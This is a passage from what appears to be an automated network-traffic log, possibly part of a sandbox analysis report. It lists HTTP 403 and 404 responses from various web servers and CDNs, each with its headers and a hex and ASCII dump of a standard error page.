and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:18 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/HfDZMuy7wHvsEdc9UjMBkF,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=X-Wix-Request-Id: 1678431258.349130731492816780X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:18 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:18 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:21 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:21 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Brj9s1q2cKj2BLz1AV4%2Bkdu34eFLLF01QG2031GOv1xi8QY85EDS%2BVDrg77PNH4SJ3RmDf2MCo1iYBDNnmQrbvrxohpV0xFpQ6K8V6hGooaoiopGC0uZynBPkBBXKE96oMc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a55a795b3719-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-siz
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:54:22 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:28 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U4D0X%2Behz3g7A3Igf2JX2r1tUCsQjS%2B%2B1usHPp%2FpwqKsNJfUD5Bw8oHnx44w28QFwkepz7k5GQdaGBk1EDCwS7QLbRb69fC8eItV9Ad%2BwK3X4kkpqE9xtdwtzOEXwUmB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a5830cd239f1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:28 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rUqRgB7Gvj2ld%2BMDKijlHv%2F7fy5i6L75h%2FJTgxDIYFlEEROmVZA94erJ0GBhQiN%2BuEZTAol2TcEOmtQITZWiqSLaDmiojLytfH6IBXsA4zuznoDw3gdnY5GZuJHBLWqI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a583edba39f1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:54:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 94c0d105-8e8c-42a2-8f07-b062463254a7CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IDuIdKuRgDrywGM%2BccKC04U3oKBpakp2pQharEBa17LEK39AhRNp0FQzi824c4g79M9TMBHQGeAvsNXRgWm10MoEdmVwZDniVlIE8G0zOePwMvXNKf%2BfBx2s%2BYneL8M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=142.999887Server: cloudflareCF-RAY: 7a59a5851cf3363f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Fri, 10 Mar 2023 06:54:30 GMTX-Zen-Fury: 27e439f73c31a17c54562199b9b8eb254d15f343X-Cache-Status: Server: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Data Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 31 38 33 30 22 2c 20 31 36 37 38 34 33 31 32 37 30 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC1830", 1678431270, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1652187628"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1652187628"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:36 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfppWgLIEGkYABcYufcc5cq,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1678431276.40987411957016812X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:54:36 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
